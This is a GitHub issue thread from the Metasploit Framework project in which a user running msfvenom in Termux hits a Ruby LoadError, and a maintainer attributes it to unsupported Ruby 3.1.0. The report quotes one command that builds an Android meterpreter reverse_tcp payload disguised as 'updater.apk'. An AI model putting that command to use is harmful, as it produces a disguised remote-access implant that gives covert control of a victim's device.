### ISSUE TITLE
Issue using Termux

### ISSUE THREAD

**Issue by Norby8** [rapid7/metasploit-framework#16329]
Hello, for first sorry for my bad english level.
I was just chilling with my tablet android while I sad myselfe, why do not use linux on android?
I was typing this code: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4444 R> /sdcard/updater.apk
Than this happened: <internal:/data/data/com.termux/files/usr/lib/ruby/3.1.0/rubygems/core_ext/kernel_require.rb>:85:in `require': cannot load such file -- metasploit/framework/profiler (LoadError)
        from <internal:/data/data/com.termux/files/usr/lib/ruby/3.1.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from /data/data/com.termux/files/usr/bin/msfvenom:23:in `<main>'.
What does it mean? 
I'm using Termux.

**Comment by Ezgghxh** [comment]
$ msfvenom
<internal:/data/data/com.termux/files/usr/lib/ruby/3.1.0/rubygems/core_ext/kernel_require.rb>:85:in `require': cannot load such file -- metasploit/framework/profiler (LoadError)

**Comment by adfoster-r7** [comment]
Ruby 3.1.0 is not supported yet; PR is here: https://github.com/rapid7/metasploit-framework/pull/16373
